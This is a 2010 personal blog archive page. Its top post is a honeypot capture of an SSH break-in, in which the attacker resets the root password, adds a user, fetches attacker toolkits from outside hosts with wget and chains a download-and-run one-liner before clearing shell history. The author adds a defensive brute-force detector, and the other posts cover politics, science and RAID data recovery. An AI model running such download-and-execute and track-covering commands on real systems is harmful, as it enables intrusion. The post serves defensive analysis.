Thursday, October 28, 2010

Romanian BlackHat Script Kid at Work

Honeypot session capture of a successful ssh compromise by what looks like a script kiddie. The session did not last long enough to determine the attacker's skill level or abilities though.

sales:~# w
18:02:29 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ps x
PID TTY TIME CMD
5673 pts/0 00:00:00 bash
5677 pts/0 00:00:00 ps x
sales:~# uname -a
Linux sales 2.6.26-2-686 #1 SMP Wed Nov 4 20:45:37 UTC 2009 i686 GNU/Linux
sales:~# cat /proc/cpuinfo
processor : 0
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 0
cpu cores : 2
apicid : 0
initial apicid : 0
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4270.03
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

processor : 1
vendor_id : GenuineIntel
cpu family : 6
model : 23
model name : Intel(R) Core(TM)2 Duo CPU E8200 @ 2.66GHz
stepping : 6
cpu MHz : 2133.305
cache size : 6144 KB
physical id : 0
siblings : 2
core id : 1
cpu cores : 2
apicid : 1
initial apicid : 1
fpu : yes
fpu_exception : yes
cpuid level : 10
wp : yes
flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc arch_perfmon pebs bts rep_good pni monitor ds_cpl vmx smx est tm2 ssse3 cx16 xtpr sse4_1 lahf_lm
bogomips : 4266.61
clflush size : 64
cache_alignment : 64
address sizes : 36 bits physical, 48 bits virtual
power management:

sales:~# passwd
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
sales:~# adduser test
Adding user `test' ...
Adding new group `test' (1001) ...
Adding new user `test' (1001) with group `test' ...
Creating home directory `/home/test' ...
Copying files from `/etc/skel' ...
Password:
Password again:

Changing the user information for test
Enter the new value, or press ENTER for the default
Username []: cd
^C
sales:~# Full Name []: cd
sales:~# cd /tmp
sales:/tmp# ls
sales:/tmp# cd /var/tmp
sales:/var/tmp# ls
sales:/var/tmp# cd
sales:~# ls
sales:~# cd /var/tmp
sales:/var/tmp# wget
wget: missing URL
Usage: wget [OPTION]... [URL]...

Try `wget --help' for more options.
sales:/var/tmp# wget gambit.altervista.org/gb.jpg
--2010-10-26 18:04:06-- http://gambit.altervista.org/gb.jpg
Connecting to gambit.altervista.org:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3943354 (3M) [image/jpeg]
Saving to: `gb.jpg

100%[======================================>] 3,943,354 155K/s eta 0s

2010-10-26 18:04:31 (155 KB/s) - `gb.jpg' saved [3943354/3943354]
sales:/var/tmp# tar zxvf gb.jpg
gb
gb/58
gb/12
gb/61
gb/39
gb/60
gb/vuln.txt
gb/57
gb/14
gb/49
gb/38
gb/13
gb/ssh
gb/9
gb/51
gb/15
gb/pscan.c
gb/16
gb/41
gb/30
gb/3
gb/1
gb/54
gb/56
gb/21
gb/34
gb/pscan2
gb/skan
gb/55
gb/59
gb/ps
gb/28
gb/17
gb/31
gb/36
gb/7
gb/52
gb/29
gb/33
gb/common
gb/32
gb/x
gb/62
gb/26
gb/5
gb/23
gb/37
gb/22
gb/10
gb/6
gb/44
gb/50
gb/43
gb/47
gb/2
gb/screen
gb/11
gb/go.sh
gb/48
gb/25
gb/gen-pass.sh
gb/pass_file
gb/45
gb/19
gb/35
gb/18
gb/ss
gb/42
gb/46
gb/20
gb/24
gb/r00t
gb/8
gb/pico
gb/53
gb/4
gb/27
gb/40
sales:/var/tmp# cd gb
sales:/var/tmp/gb# chmod +x *
sales:/var/tmp/gb# ./x 41.243
___
{o,o}
|)__)
-"-"-
O RLY? ^C
sales:/var/tmp/gb# cd
sales:~# cd /var/tmp
sales:/var/tmp# ls
gb.jpg gb
sales:/var/tmp# rm -rf gb
sales:/var/tmp# rm -rf gb.jpg
sales:/var/tmp# wget http://bido.hi2.ro/signed.tgz ; tar xzvf signed.tgz ; rm -rf signed.tgz ; cd ._ ; chmod +x * ; export PATH="." ; sh
--2010-10-26 18:05:17-- http://bido.hi2.ro/signed.tgz
Connecting to bido.hi2.ro:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 891356 (870K) [application/x-gzip]
Saving to: `signed.tgz

100%[======================================>] 891,356 51K/s/s eta 0s

2010-10-26 18:05:35 (51 KB/s) - `signed.tgz' saved [891356/891356]
._
._/configure
._/1.user
._/m.lev
._/m.set
._/checkmech
._/r
._/r/raway.e
._/r/rnicks.e
._/r/rversions.e
._/r/rtsay.e
._/r/rsignoff.e
._/r/rpickup.e
._/r/rsay.e
._/r/rkicks.e
._/r/rinsult.e
._/LinkEvents
._/src
._/src/gencmd.c
._/src/vars.c
._/src/vars.o
._/src/function.c
._/src/global.h
._/src/channel.c
._/src/gencmd
._/src/socket.c
._/src/defines.h
._/src/main.c
._/src/xmech.c
._/src/config.h.in
._/src/dcc.c
._/src/cfgfile.o
._/src/trivia.o
._/src/usage.h
._/src/socket.o
._/src/com-ons.c
._/src/parse.c
._/src/commands.o
._/src/combot.o
._/src/Makefile.in
._/src/parse.o
._/src/text.h
._/src/debug.c
._/src/Makefile
._/src/trivia.c
._/src/commands.c
._/src/structs.h
._/src/link.o
._/src/channel.o
._/src/h.h
._/src/cfgfile.c
._/src/dcc.o
._/src/config.h
._/src/userlist.c
._/src/main.o
._/src/xmech.o
._/src/com-ons.o
._/src/mcmd.h
._/src/link.c
._/src/function.o
._/src/combot.c
._/src/userlist.o
._/src/debug.o
._/Makefile
._/sh
._/pico
._/m.h
._/m.pid
._/bsd
._/2.user
sales:/var/tmp/._# cd
sales:~#
sales:~#
sales:~# cd
sales:~# w
18:05:41 up 14 days, 3:53, 1 user, load average: 0.08, 0.02, 0.01
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
root pts/0 81.180.208.214 18:02 0.00s 0.00s 0.00s w
sales:~# ls
sales:~# history -c

The archive gb.jpg (a gzipped tar despite the .jpg extension) contains a port scanner (pscan2) and an ssh brute-force program like unixcod; you can even see the attacker test it using the same syntax unixcod takes. Most of the numbered files are dictionary files of username/password combinations. It would probably be a good idea to install breakingguard or denyhosts on any ssh-enabled Linux/Unix/Mac OS X system. The second archive, signed.tgz, is the EnergyMech IRC bot.
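As an added example (mine, not part of the original post and not denyhosts' code), here is a small Python detector of the kind denyhosts automates: it parses sshd entries from auth.log, counts failed logins per source address inside a sliding window, flags the case that matters most (a brute-forcing source that eventually got in), and emits hosts.deny lines. The log lines are constructed; the source address is the one in the session above, while the timestamps, PIDs and usernames are made up.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the syslog format Debian's sshd writes to /var/log/auth.log.
# The source address is the one from the honeypot session above; everything else is invented.
SAMPLE_AUTH_LOG = """\
Oct 26 18:01:02 sales sshd[5610]: Failed password for root from 81.180.208.214 port 41122 ssh2
Oct 26 18:01:03 sales sshd[5612]: Failed password for invalid user admin from 81.180.208.214 port 41130 ssh2
Oct 26 18:01:05 sales sshd[5614]: Failed password for invalid user test from 81.180.208.214 port 41141 ssh2
Oct 26 18:01:06 sales sshd[5616]: Failed password for root from 81.180.208.214 port 41150 ssh2
Oct 26 18:01:08 sales sshd[5618]: Failed password for root from 81.180.208.214 port 41162 ssh2
Oct 26 18:02:29 sales sshd[5670]: Accepted password for root from 81.180.208.214 port 41209 ssh2
Oct 26 18:03:10 sales sshd[5700]: Failed password for alice from 10.0.0.5 port 51000 ssh2
Oct 26 18:03:12 sales sshd[5702]: Accepted publickey for alice from 10.0.0.5 port 51002 ssh2
"""

# Matches both "Failed password for root from ..." and "Failed password for invalid user x from ..."
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def parse_events(text, year=2010):
    """Turn auth.log text into (timestamp, result, user, ip) tuples; syslog omits the year."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def find_bruteforcers(events, threshold=5, window=timedelta(minutes=10)):
    """Return {ip: peak failure count} for sources with >= threshold failures inside the window."""
    recent = defaultdict(list)   # ip -> timestamps of failures still inside the window
    offenders = {}
    for ts, result, _user, ip in sorted(events):
        if result != "Failed":
            continue
        q = recent[ip]
        q.append(ts)
        while q and ts - q[0] > window:   # slide the window forward
            q.pop(0)
        if len(q) >= threshold:
            offenders[ip] = max(offenders.get(ip, 0), len(q))
    return offenders


def successes_after_failures(events, offenders):
    """The alert worth paging on: a source that was brute-forcing and then logged in."""
    return [(ip, user, ts) for ts, result, user, ip in sorted(events)
            if result == "Accepted" and ip in offenders]


def hosts_deny_lines(offenders):
    """TCP-wrappers entries for /etc/hosts.deny, the same mechanism denyhosts drives."""
    return [f"sshd: {ip}" for ip in sorted(offenders)]


if __name__ == "__main__":
    evs = parse_events(SAMPLE_AUTH_LOG)
    bad = find_bruteforcers(evs)
    for ip, user, ts in successes_after_failures(evs, bad):
        print(f"ALERT {ts}: {ip} succeeded as {user} after {bad[ip]} failures")
    print("\n".join(hosts_deny_lines(bad)))
```

The threshold and window are the knobs that trade false positives against reaction time; the pattern in the session above (a burst of failures followed by an accepted root password from the same address) is what `successes_after_failures` surfaces.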



Wednesday, October 27, 2010

The Buddha

The Buddha is a good show. I bought the DVD and watched it. Two computers wouldn't play it though. Had to watch it on my laptop. DRM on a movie about one of the great spiritual masters that prevents the owner from playing it. What to make of that. This segment is as sad as the Crucifixion of Jesus as depicted in several movies.



Enlightenment Versus Intellect

If you memorize slogans,
you are unable to make
subtle adaptations according
to the situation.
It is not that there is no
way to teach insight to learners,
but once you have learned a way,
it is essential that you get
it to work completely.
If you just stick to your
teacher's school and memorize slogans,
his is not enlightenment,
it is a part of intellectual knowledge.

- Fayan



BoingBoing Torture Euphemism Generator



Original link is here if the iframe is too slow. Where's George Carlin when we need him? This reminds me of Caputo's A Rumor of War. Read pages 166-167 to see how the U.S. Army describes what happens to someone who steps on a mine made from a 155mm artillery shell, what the military calls an IED today. (Yes, they had IEDs in Vietnam.) I suppose an optimist would say we are making progress when many of our veterans only come home maimed and brain-damaged instead of in little tiny fragments.

The MSM supported the government during the Vietnam War and they support the government now. When the MSM quits supporting the wars overseas, then the government will look for the exits. But the MSM only quits after it is obvious that the Army is losing and the people have already decided that the war was folly and waste to begin with.

I believe that the latest fad in national defense policy circles is to pull out Vietnam analyses and substitute the words Afghanistan and Taliban for North Vietnam and Viet Cong/NVA. The North Vietnamese knew they could outlast us. Even if we won every battle, they still won the war, making our role in Vietnam pointless. The Taliban have the same incentive. They can lose every battle and still win the war. Our only way to victory is to uplift Afghan society such that the Taliban and their agenda become meaningless. That won't happen because the focus isn't to win through rebuilding the society, but to destroy an enemy that operates like a ghost in the night. Our military trains people to kill the "enemy" and the emphasis is on destruction of the enemy and the enemy's society which we already occupy. Using the military for nation building only happened once, after World War II when we rebuilt Germany and Japan after both countries had been thoroughly destroyed. WWII was the exception, not the rule. Every successful American conflict has been one of subjugation followed by colonization or, the equivalent, building military bases in those countries.

If we were serious about winning and rebuilding Afghanistan, we'd have sent 10,000 extra troops into the country instead of 30,000 extra troops. They'd have been combat engineers who could have built roads. The money saved from not sending the other 20,000 troops (roughly $20,000,000,000 or more) could have been given to the Afghans through NGOs to build schools and infrastructure and improve their quality of living through their own hard work and labor. Instead we piss lives and money away chasing ghosts, supporting a corrupt government, and using the latest hardware when we know that good old B-52s, A-10s, donkeys, Chinooks, and M-14s work better in country than B-1s, B-2s, humvees, MRAPS, F-22s, and M-4s. Vietnam Part II. Nothing seems to change with current American military doctrine except the terminology used to describe it.



Monday, October 25, 2010

Searching for Extraterrestrial Life

SETI will likely not succeed. The interval when a civilization uses radio waves is quite small compared to the life span of a civilization. It is far more likely that exoplanet hunters will find an advanced civilization before SETI does. Think about it. With the recent paper on planetary orbital engineering where planets are moved into favorable orbits, what would the implications be to any exoplanet astronomer? If I saw two or more planets in the same or very close orbits within the habitable region of a solar system, I'd know that chances are they didn't get there by themselves. It would be very cool if Kepler or a Kepler like mission actually found a solar system where the planets have been moved by intelligent beings. Such a system would last a very long time provided the orbital solutions were properly calculated.



A Lunar Desert Isn't That Wet

I'm not sure what to make of these results. I am not a planetary scientist, but there were no blatant traces of water when the Centaur stage impacted the Moon. Some of this water is likely non-existent, just hydrogen ions trapped in the lunar regolith. The news reports have been hyping that the Moon is a lot wetter than we thought. It is highly likely that the Moon is a drier desert than any desert on Earth. It is quite probable that the earthly deserts look like rain forests compared to the aridity of the Moon.

Perhaps in 100-250 years if the scientific pace keeps up, we'll be able to terraform our Moon and make it a green and blue ball in our sky. A silver Moon will be a memory of the past. Arthur C. Clarke wrote a story featuring a Russian scientist who was accidentally killed by a plant he created that could live and thrive on the Moon. Can you imagine lunar redwoods that dwarf the redwoods in the Pacific Northwest? We'd have to import a lot of icy comets from the Oort Cloud, but likely, the water we need is there.



Sunday, October 24, 2010

Why Medical Research (and Economics Research) is Wrong?

There is an Atlantic article entitled, "Lies, Damn Lies, and Medical Science". It's about the finding of a small group of researchers led by Dr. John Ioannidis who are showing how flawed the academic biomedical research establishment's findings are. This is not a bad thing. Science only progresses through self examination, self reflection, and checking assumptions. Any field of science or academic research will have a percentage of incorrect results being published. The question is, what is that percentage? The "harder" the science, the lower the percentage of bad or flawed publications. The softer the science or the more perverse the incentives to succeed, the more publications will be bad, flawed, or fraudulent. The following is from a comment I posted on NakedCapitalism.

The Atlantic article appears to support Sturgeon’s Revelation that 90% of everything humans produce is crud. I once had a discussion with my thesis advisor about scientific results due to a scientific misconduct case occurring in the early 1990’s. His belief was that in that particular Nobel Prize winner’s lab, that the pressure to produce was so great that at least 30% of results emanating from that lab were either flawed or fabricated. The problem is that if caught fabricating evidence, the researcher’s career is effectively over. In biomedical research, it is easier to fabricate evidence in obscure fields or areas where one’s results are not likely to be checked. The more prestigious the result, the less likely false or misleading evidence will go unnoticed because others will try to reproduce the results and fail. This is how cheaters are caught.

Even then, some studies are flawed due to environmental factors. Scientists who work with mice found out that different treatment results from the same treatment with different mouse strains could be minimized if they limited food intake shortly before the study began. Different mouse strains giving different results for the same treatment go back 70 years or more. Recently, they discovered that having mice in different cages affected study results.

With medical papers, it’s more difficult to catch frauds. Add in the uncertainty of mice studies and multiply the effect with humans. Every person is unique in genotype and phenotype. We are not at all like inbred mouse strains. Add in insufficient statistical sample sizes, bad statistical analysis, sloppy methodology, environmental and psychological effects, and it’s difficult to tell if the author is incompetent or a fraud. Generally, with frauds, the results are too good to be true, and the methodology is sound, but the results are unreproducible. But, the poor quality of clinical medical articles seems to have been a given for some time.

What the Atlantic article didn’t discuss is the difference in publications between researchers in fields with dedicated funding such as Germany versus America. German researchers generally don’t have to worry about publishing to obtain funding. Their funding is dedicated, so the publish or perish linkage is broken. Therefore, there is less pressure to be “right” or prove others wrong for career or professional advancement. Since the US publishes a great deal more research than any other nation or even group of nations, the results will be skewed by our publish or perish system. It would be informative to know who is getting correct results rather than who is getting it wrong for prestige or profit. Until the incentives are fixed and proper methodologies followed, nothing will change in medicine, economics, or any other field of human endeavor.



Saturday, October 23, 2010

Surgical File Recovery using the MFT and File Based Imaging

This is a rather new technology demoed by Scott A. Moulton utilizing the $MFT and $Bitmap files and a special machine:

Outerz0ne 6 - Hard Drive Kung Fu Magic 1
Outerz0ne 6 - Hard Drive Kung Fu Magic 2
Outerz0ne 6 - Hard Drive Kung Fu Magic 3
Outerz0ne 6 - Hard Drive Kung Fu Magic 4
Outerz0ne 6 - Hard Drive Kung Fu Magic 5



SSD Data Recovery and Forensics and the Lack Thereof

Scott Moulton has posted two talks on Solid State Disk drives and data recovery/forensics.

Solid State Drives will Ruin Forensics:

Solid State Drives will Ruin Forensics Part 1/5
Solid State Drives will Ruin Forensics Part 2/5
Solid State Drives will Ruin Forensics Part 3/5
Solid State Drives will Ruin Forensics Part 4/5
Solid State Drives will Ruin Forensics Part 5/5

SSD Flash Hard Drives - Shmoocon 2008:

SSD Flash Hard Drives - Shmoocon 2008 - 1/6
SSD Flash Hard Drives - Shmoocon 2008 - 2/6
SSD Flash Hard Drives - Shmoocon 2008 - 3/6
SSD Flash Hard Drives - Shmoocon 2008 - 4/6
SSD Flash Hard Drives - Shmoocon 2008 - 5/6
SSD Flash Hard Drives - Shmoocon 2008 - 6/6



Scott Moulton on RAID

I am posting more of Scott Moulton's presentations to make it easier for people to find the relevant information. None of this information is mine, and I make no claims to it. It is highly unusual for a person such as Scott to teach such useful knowledge in such a tight-lipped field as data recovery and digital forensics.

Dynamic Disk Array Data Recovery (Windows LDM)

RAID Data Recovery Presentation:
RAID Reassembly by Sight and Sound Part 1/6
RAID Reassembly by Sight and Sound Part 2/6
RAID Reassembly by Sight and Sound Part 3/6
RAID Reassembly by Sight and Sound Part 4/6
RAID Reassembly by Sight and Sound Part 5/6
RAID Reassembly by Sight and Sound Part 6/6

His Defcon17 RAID speech (pdf).
FreeSoftwareMagazine article and source code.
R-Tools Technology RAID Presentation.
RAID 5 perl script:

#!/usr/bin/perl -w

#
# raid5 perl utility
# Copyright (C) 2005 Mike Hardy <[EMAIL PROTECTED]>
#
# This script understands the default linux raid5 disk layout,
# and can be used to check parity in an array stripe, or to calculate
# the data that should be present in a chunk with a read error.
#
# Constructive criticism, detailed bug reports, patches, etc gladly accepted!
#
# Thanks to Ashford Computer Consulting Service for their handy RAID information:
# http://www.accs.com/p_and_p/RAID/index.html
#
# Thanks also to the various linux kernel hackers that have worked on 'md',
# the header files and source code were quite informative when writing this.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2, or (at your option)
# any later version.
#
# You should have received a copy of the GNU General Public License
# (for example /usr/src/linux/COPYING); if not, write to the Free
# Software Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

my @array_components = (
"/dev/loop0",
"/dev/loop1",
"/dev/loop2",
"/dev/loop3",
"/dev/loop4",
"/dev/loop5",
"/dev/loop6",
"/dev/loop7"
);

my $chunk_size = 64 * 1024; # chunk size is 64K
my $sectors_per_chunk = $chunk_size / 512;


# Problem - I have a bad sector on one disk in an array
my %component = (
"sector" => 2032,
"device" => "/dev/loop3"
);


# 1) Get the array-related info for that sector
# 2) See if it was the parity disk or not
# 2a) If it was the parity disk, calculate the parity
# 2b) If it was not the parity disk, calculate its value from parity
# 3) Write the data back into the sector

(
$component{"array_chunk"},
$component{"chunk_offset"},
$component{"stripe"},
$component{"parity_device"}
) = &getInfoForComponentAddress($component{"sector"}, $component{"device"});

foreach my $KEY (keys(%component)) {
print $KEY . " => " . $component{$KEY} . "\n";
}

# We started with the information on the bad sector, and now we know how it fits into the array
# Lets see if we can fix the bad sector with the information at hand

# Build up the list of devices to xor in order to derive our value
my %xor_devices;
my $xor_count = -1;
for (my $i = 0; $i <= $#array_components; $i++) {

# skip ourselves as we roll through
next if ($component{"device"} eq $array_components[$i]);

# skip the parity chunk as we roll through
next if ($component{"parity_device"} eq $array_components[$i]);

$xor_devices{++$xor_count} = $array_components[$i];

print
"Adding xor device " .
$array_components[$i] . " as xor device " .
$xor_count . "\n";
}

# If we are not the parity device, put the parity device at the end
if (!($component{"device"} eq $component{"parity_device"})) {

$xor_devices{++$xor_count} = $component{"parity_device"};

print
"Adding parity device " .
$component{"parity_device"} . " as xor device " .
$xor_count . "\n";
}


# pre-calculate the device offset (in sectors), declare the read buffer, and
# initialize the xor buffer with NUL bytes: this is a string xor, so a buffer
# of ASCII "0" characters would corrupt every result
my $device_offset = $component{"stripe"} * $sectors_per_chunk;
my $data;
my $xor_result = "\0" x ($sectors_per_chunk * 512);

# Read in the chunks and feed them into the xor buffer
for (my $i = 0; $i <= $xor_count; $i++) {

print
"Reading in chunk on stripe " .
$component{"stripe"} . " (sectors " .
$device_offset . " - " .
($device_offset + $sectors_per_chunk) . ") of device " .
$xor_devices{$i} . "\n";

# Open the device and read this chunk in (seek takes a byte offset, so convert sectors to bytes)
open(DEVICE, "<" . $xor_devices{$i})
|| die "Unable to open device " . $xor_devices{$i} . ": " . $! . "\n";
binmode(DEVICE);
seek(DEVICE, $device_offset * 512, 0)
|| die "Unable to seek to sector " . $device_offset . " on device " .
$xor_devices{$i} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $xor_devices{$i} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing ($data is already raw bytes, so no pack("B*") step)
my $hexdata = unpack("H*", $data);
#print "Got data '" . $hexdata . "' from device " . $xor_devices{$i} . "\n";

# xor the data in there
$xor_result ^= $data;
}

my $hex_xor_result = unpack("H*", $xor_result);
#print "got hex xor result '" . $hex_xor_result . "'\n";

#########################################################################################
# Testing only -
# Check to see if the result I got is the same as what is in the block
open (DEVICE, "<" . $component{"device"})
|| die "Unable to open device " . $component{"device"} . ": " . $! . "\n";
binmode(DEVICE);
seek(DEVICE, $device_offset * 512, 0)
|| die "Unable to seek to sector " . $device_offset . " on device " .
$component{"device"} . ": " . $! . "\n";
read(DEVICE, $data, ($sectors_per_chunk * 512))
|| die "Unable to read device " . $component{"device"} . ": " . $! . "\n";
close(DEVICE);

# Convert binary to hex for printing
my $hexdata = unpack("H*", $data);
#print "Got data '" . $hexdata . "' from device " . $component{"device"} . "\n";


# Do the comparison, and report what we've got
if (!($hexdata eq $hex_xor_result)) {
print "The value from the device, and the computed value from parity are inequal for some reason...\n";
}
else {
print "Device value matches what we computed from other devices. Score!\n";
}
#########################################################################################



# Given an array component, and a sector address in that component, we want
# 1) the disk/sector combination for the start of its stripe
# 2) the disk/sector combination for the start of its parity
sub getInfoForComponentAddress {

# Get our arguments into (hopefully) well-named variables
my $sector = shift();
my $device = shift();

print "determining info for sector "
. $sector . " on "
. $device . "\n";

# Get the stripe number
my $stripe = int($sector / $sectors_per_chunk);
print "stripe number is " . $stripe . "\n";

# Get the offset in the stripe
my $chunk_offset = $sector % $sectors_per_chunk;
print "chunk offset is " . $chunk_offset . "\n";

# See what device index our device is
my $device_index = 0;
for (my $i = 0; $i <= $#array_components; $i++) {
if ($device eq $array_components[$i]) {
$device_index = $i;
print "This disk is device " . $device_index . " in the array\n";
}
}

# Figure out which disk holds parity for this stripe
# FIXME only handling the default left-asymmetric style right now
# (parity walks from the last disk down toward disk 0, one disk per stripe)
my $parity_device_index = ($#array_components) - ($stripe % scalar(@array_components));
print "parity device index for stripe " . $stripe . " is " .
$parity_device_index . "\n";
my $parity_device = $array_components[$parity_device_index];

# Figure out which chunk of the array this is (each stripe holds one data chunk per non-parity disk)
# FIXME only handling the default left-asymmetric style right now
my $array_chunk = $stripe * (scalar(@array_components) - 1) + $device_index;
if ($device_index > $parity_device_index) {
$array_chunk--;
}

# Check for the special case where this device *is* the parity device and return special
if ($device_index == $parity_device_index) {
$array_chunk = -1;
}

return (
$array_chunk,
$chunk_offset,
$stripe,
$parity_device
);
}
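To make the layout the script assumes concrete, here is an added Python example (mine, not Mike Hardy's script and not from Scott Moulton's material) that builds a tiny four-disk RAID 5 left-asymmetric array in memory, checks that every stripe's parity is consistent, and reconstructs one chunk by XORing the other disks' chunks on that stripe, which is the same calculation the Perl script performs against real block devices. The disk count, chunk size and payload are constructed for readability.

```python
from functools import reduce

CHUNK = 16      # constructed: a tiny chunk so the demo stays readable (md's default is 64K)
N_DISKS = 4     # constructed: four-member array


def parity_disk(stripe, n_disks):
    """Left-asymmetric layout: parity starts on the last disk and walks toward disk 0."""
    return (n_disks - 1) - (stripe % n_disks)


def data_disk_for_chunk(array_chunk, n_disks):
    """Map a logical array chunk to (stripe, disk index), skipping the parity disk."""
    data_disks = n_disks - 1
    stripe, idx = divmod(array_chunk, data_disks)
    pd = parity_disk(stripe, n_disks)
    disk = idx if idx < pd else idx + 1
    return stripe, disk


def xor_blocks(blocks):
    """Byte-wise XOR of equal-length byte strings."""
    return bytes(reduce(lambda a, b: a ^ b, col) for col in zip(*blocks))


def build_array(payload, n_disks=N_DISKS, chunk=CHUNK):
    """Lay payload out as RAID 5 left-asymmetric; returns one bytearray per member disk."""
    data_disks = n_disks - 1
    n_chunks = -(-len(payload) // chunk)          # ceiling division
    n_stripes = -(-n_chunks // data_disks)
    disks = [bytearray(n_stripes * chunk) for _ in range(n_disks)]
    for c in range(n_chunks):
        piece = payload[c * chunk:(c + 1) * chunk].ljust(chunk, b"\0")
        stripe, disk = data_disk_for_chunk(c, n_disks)
        disks[disk][stripe * chunk:(stripe + 1) * chunk] = piece
    for s in range(n_stripes):
        pd = parity_disk(s, n_disks)
        others = [bytes(disks[d][s * chunk:(s + 1) * chunk])
                  for d in range(n_disks) if d != pd]
        disks[pd][s * chunk:(s + 1) * chunk] = xor_blocks(others)
    return disks


def reconstruct_chunk(disks, bad_disk, stripe, chunk=CHUNK):
    """Recompute the chunk at (bad_disk, stripe) from every other disk's chunk on that stripe.
    Works whether the bad chunk held data or parity: XOR of the remaining members is the answer."""
    others = [bytes(disks[d][stripe * chunk:(stripe + 1) * chunk])
              for d in range(len(disks)) if d != bad_disk]
    return xor_blocks(others)


def check_stripe_parity(disks, stripe, chunk=CHUNK):
    """A stripe is consistent when all of its chunks XOR to zero."""
    all_chunks = [bytes(d[stripe * chunk:(stripe + 1) * chunk]) for d in disks]
    return xor_blocks(all_chunks) == b"\0" * chunk


if __name__ == "__main__":
    payload = b"The quick brown fox jumps over the lazy dog" * 3   # constructed test data
    disks = build_array(payload)
    print("stripes consistent:", all(check_stripe_parity(disks, s) for s in range(3)))
    original = bytes(disks[2][16:32])
    disks[2][16:32] = b"\xff" * 16          # simulate an unreadable chunk on disk 2, stripe 1
    print("recovered:", reconstruct_chunk(disks, 2, 1) == original)
```

The parity placement and the "skip the parity disk" step in `data_disk_for_chunk` are exactly the two FIXME points in the Perl script; a different md layout (left-symmetric, right-asymmetric, ...) changes only those two functions, while the XOR reconstruction is the same for all of them.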



Thursday, October 21, 2010

Hard Drive Data Recovery Splained by Scott Moulton

Scott Moulton of myharddrivedied.com teaches hard drive data recovery and forensics. Here is a series of talks about hard drives. The first talk is a top ten useful hard drive trivia talk. The DIY talk is very informative and tells you what software is the most useful for data recovery, and what you can and can't fix if you lose a drive.

Ten Cool Things You Did Not Know About Your Hard Drive.

DIY Hard Drive Diagnostics Presentation. (7/7)

Other presentations are here. His youtubechannel is here. The Defcon 14 talk isn't as informative as the DIY Hard Drive Diagnostics presentation, but it is still valuable.

Some tips:

Software:
MHDD, Victoria, ddrescue, NTFS Explorer, Secure Erase
Overwriting the data on the drive one time will ensure that any sensitive data is gone forever. There is no need to overwrite the disk multiple times, but Secure Erase is a much faster and safer way to destroy sensitive data.

Hardware:
After 2006, chances are you will have a firmware or board problem. WD drives with triangular integrated electronics boards cannot be fixed simply by replacing the boards. A ROM chip (U12) has to be moved from the old board onto the replacement board. Also, never open a WD drive without some research. The way the hard drives are manufactured, if the case is opened, chances are that you will misalign the platters and then you are screwed because there's no way to realign the platters to recover the data. The drive may be repaired, but the data is lost. Here's a video presentation by another data recovery firm, ACSData.

The outer edge of the drive is the fastest part of the hard drive. Your first partition goes there. Many operating systems partition the drive such that the places where you want the greatest performance are at the worst location, closer to the spindle. Basically, you want the swap partition to be the last partition and the database partition to be the first partition. Ubuntu's default install partitions the drive very suboptimally. My Debian (aptosid) laptop is partitioned properly, but my Ubuntu KVM server/workstation isn't. :-\ I'm glad that I at least had clue enough to use ddrescue for data recovery issues in the past.

Backup, backup, backup! SCSI drives are superior to ATA drives. Today's ATA drives are so cheaply made that their failure rate has gone through the roof. That said, 70% of drive failures are recoverable via software such as a Knoppix live CD with ddrescue and testdisk. 10% of the remaining failures are the IDE PCB, which in some cases can be replaced easily (see onepcbsolution.com). So, 80% of the time, hard drives' data can be recovered without opening the hard drive. USB flash memory and other forms of flash memory are the discards from Cisco and other NAND flash memory manufacturers/users. Also, flash memory will fail after 10 years without periodic recharging. SSD drives cannot be easily recovered since you would have to desolder and move the chips from one board to another. Yikes!



Tuesday, October 19, 2010

Bad Headlines

Happy Days's Tom Bosley Dead at first glance registered as "Happy Days, Tom Bosley Dead at 83" just glancing at Google News. Couldn't they have worded it a bit better?

More than one tool for the Fed at first glance on the Calculated Risk blog seemed to read "More than one fool for the Fed".

The latter one probably offers a glimpse into my twisted little mind.



Snooping Kit Phone Creeper v0.95 Released for Windows Mobiles

One reason not to own a Windows mobile phone.



Monday, October 18, 2010

Just Say No to Plagiarism!

